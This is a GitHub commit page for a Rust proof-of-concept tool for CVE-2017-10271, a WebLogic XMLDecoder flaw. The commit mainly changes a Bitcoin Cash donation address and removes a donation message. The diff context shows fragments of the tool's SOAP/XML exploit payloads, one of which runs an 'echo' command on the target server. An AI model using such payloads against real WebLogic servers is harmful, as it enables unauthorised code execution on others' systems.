Skip to content

Commit

Permalink
Change donate address, remove some boring donation info.
Browse files Browse the repository at this point in the history
  • Loading branch information
SuperHacker-liuan committed Feb 2, 2018
1 parent 920f008 commit 6698a73
Show file tree
Hide file tree
Showing 5 changed files with 7 additions and 9 deletions.
2 changes: 1 addition & 1 deletion Cargo.lock

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

2 changes: 1 addition & 1 deletion Cargo.toml
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
[package]
name = "cve-2017-10271-poc"
version = "0.3.0"
version = "0.3.1"
authors = ["刘安 <[email protected]>"]
license = "GPL-3.0"

Expand Down
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -44,7 +44,7 @@ $ cve-2017-10271-poc http://www.test.com http://www.test.org http://www.test.net
```
## Donate developer

If you are willing to help developer, please donate Bitcoin Cash to address `bitcoincash:qp0k3flm8y5rpymkpc0wzphdev5np47xvu8wdxewrh`.
If you are willing to help developer, please donate Bitcoin Cash to address `BITCOINCASH:QPZNZ089TQKAVWF6XM6SD8KPGM59FF5H6CKV0585EP`.

Pull requests are also welcomed.

Expand Down Expand Up @@ -92,6 +92,6 @@ $ cve-2017-10271-poc http://www.test.com http://www.test.org http://www.test.net

## 捐赠开发者

如果你乐意的话,欢迎向开发者捐赠比特币现金,地址是`bitcoincash:qp0k3flm8y5rpymkpc0wzphdev5np47xvu8wdxewrh`
如果你乐意的话,欢迎向开发者捐赠比特币现金,地址是`BITCOINCASH:QPZNZ089TQKAVWF6XM6SD8KPGM59FF5H6CKV0585EP`

同时,欢迎提供pull requests
6 changes: 3 additions & 3 deletions src/constant.rs
Original file line number Diff line number Diff line change
Expand Up @@ -12,7 +12,7 @@ pub const EXEC_BODY: &str = r#"<?xml version="1.0" encoding="utf-8"?>
<object idref="cls"></object>
<void method="newInstance">
<void method="say" id="proc">
<string>echo bitcoincash:qp0k3flm8y5rpymkpc0wzphdev5np47xvu8wdxewrh</string>
<string>echo BITCOINCASH:QPZNZ089TQKAVWF6XM6SD8KPGM59FF5H6CKV0585EP</string>
</void>
</void>
</void>
Expand Down Expand Up @@ -47,7 +47,7 @@ pub const SIMPLE_BODY: &str = r#"<?xml version="1.0" encoding="utf-8"?>
<void method="getResponse">
<void method="getServletOutputStream">
<void method="print">
<string>bitcoincash:qp0k3flm8y5rpymkpc0wzphdev5np47xvu8wdxewrh</string>
<string>BITCOINCASH:QPZNZ089TQKAVWF6XM6SD8KPGM59FF5H6CKV0585EP</string>
</void>
<void method="flush"/>
</void>
Expand All @@ -61,7 +61,7 @@ pub const SIMPLE_BODY: &str = r#"<?xml version="1.0" encoding="utf-8"?>
<soapenv:Body/>
</soapenv:Envelope>"#;

pub const VULNER_TEXT: &str = r#"bitcoincash:qp0k3flm8y5rpymkpc0wzphdev5np47xvu8wdxewrh"#;
pub const VULNER_TEXT: &str = r#"BITCOINCASH:QPZNZ089TQKAVWF6XM6SD8KPGM59FF5H6CKV0585EP"#;

pub const DONATE: &str = VULNER_TEXT;
pub const USAGE: &str = r#"cve-2017-10271-poc <site1> <site2> ..."#;
Expand Down
2 changes: 0 additions & 2 deletions src/main.rs
Original file line number Diff line number Diff line change
Expand Up @@ -52,8 +52,6 @@ fn run() {
term.cout("\n\nEXAMPLE:", &spec);
term.out(constant::EXAMPLE);
} else {
term.out("\nThank you for donation: ");
cout_donate();
term.out("\n")
}
}
Expand Down

0 comments on commit 6698a73

Please sign in to comment.